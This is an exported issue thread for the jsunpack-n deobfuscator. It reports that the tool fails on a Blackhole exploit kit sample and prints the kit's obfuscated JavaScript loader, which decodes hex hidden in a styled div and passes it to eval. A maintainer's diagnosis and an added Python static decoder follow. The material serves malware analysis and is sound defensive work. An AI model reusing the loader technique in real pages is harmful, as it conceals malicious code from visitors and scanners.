urule99 / jsunpack-n

Automatically exported from code.google.com/p/jsunpack-n
GNU General Public License v2.0

Div Obfuscation causes jsunpack to fail #23

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago
Jsunpack is not able to handle the latest Blackhole exploit kit, which contains 
obfuscation within the div tags.

<html><body><style>#q{color:#fff;}</style><div id="q" 
style="display:block;">3320.........

<script>z=function(){c="";
d=11;
for(i=32478-1;i!=-1;i--){
    w=i;
    v=a[w];
    dd=32478-i-2+1;
    b=d;
    dd=dd-b*Math.floor(dd/d);
    k=v*1-(dd-13);
    kk=k;
    c+=f.fromCharCode(kk);
}
md="a";
try{prototype||123;}catch(dagdsg){if(020==0x10)eval(c);}}
if(window.document)for(i=0;i<document.body.childNodes.length;i++){
    if (document.body.childNodes[i].hasAttribute("style"))
        if(z)g=document.body.childNodes[i].innerHTML.replace(/hwehes/g,"");
}
a=[];
for(i=0;i<g.length;i+=2){
    gg=g.substr(i,0x2);
    a.push(parseInt(gg,0x10));
}
try{fwq&prototype}catch(qwrwqr){
if(020==0x10){f=String;
}}
z();
        </script>

Attaching a sample file.

Original issue reported on code.google.com by rahulmoh...@gmail.com on 13 Aug 2012 at 6:16

GoogleCodeExporter commented 9 years ago
The div is properly parsed; the issue is the call to 
document.body.childNodes[i].hasAttribute. I edited the JavaScript in the sample 
to prove this as follows:

//edit start

/*if(window.document)for(i=0;i<document.body.childNodes.length;i++){
    if (document.body.childNodes[i].hasAttribute("style"))
        if(z)g=document.body.childNodes[i].innerHTML.replace(/hwehes/g,"");
}*/

if(z)g=document.getElementById('q').innerHTML.replace(/hwehes/g,"");

//edit end

Please review the jsunpack submission here: 
http://jsunpack.jeek.org/?report=69829f230fea941b3e7d10ae8a6066baf2cea1b4

Original comment by urul...@gmail.com on 13 Aug 2012 at 2:00
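
For analysts who need the payload without relying on DOM emulation, the decoding routine in the sample can be reproduced statically. The following is an added example, not jsunpack-n code and not written by either commenter. It assumes the constant 32478 in the sample is the length of the byte array, and its SAMPLE input is constructed and encodes a harmless string.

```python
from html.parser import HTMLParser

FILLER = "hwehes"  # junk token the sample strips with .replace(/hwehes/g, "")
MODULUS = 11       # d=11 in the sample
OFFSET = 13        # k = v*1 - (dd - 13)


class StyledNodeText(HTMLParser):
    """Collect the text of the last element that carries a style attribute,
    which is what the sample's childNodes/hasAttribute("style") loop selects."""

    def __init__(self):
        super().__init__()
        self.depth = 0   # > 0 while inside a styled element
        self.text = ""

    def handle_starttag(self, tag, attrs):
        if self.depth:
            self.depth += 1
        elif any(name == "style" for name, _ in attrs):
            self.depth, self.text = 1, ""  # a later match overwrites g

    def handle_endtag(self, tag):
        if self.depth:
            self.depth -= 1

    def handle_data(self, data):
        if self.depth:
            self.text += data


def decode_div_payload(html):
    parser = StyledNodeText()
    parser.feed(html)
    # Assumption: whitespace is dropped so line-wrapped dumps still decode.
    g = "".join(parser.text.replace(FILLER, "").split())
    a = [int(g[i:i + 2], 16) for i in range(0, len(g), 2)]
    n = len(a)  # 32478 in the reported sample
    # Walk the array backwards; the per-position offset repeats every 11 bytes.
    return "".join(chr(a[i] + OFFSET - (n - 1 - i) % MODULUS)
                   for i in range(n - 1, -1, -1))


# Constructed input (not the attached sample): encodes "var benign=1;".
SAMPLE = ('<html><body><style>#q{color:#fff;}</style><div id="q" '
          'style="display:block;">2f243ahwehes6a6263675d59hwehes16675569'
          '</div></body></html>')

if __name__ == "__main__":
    print(decode_div_payload(SAMPLE))
```

The decoder only returns the string that the sample would pass to eval; nothing is executed.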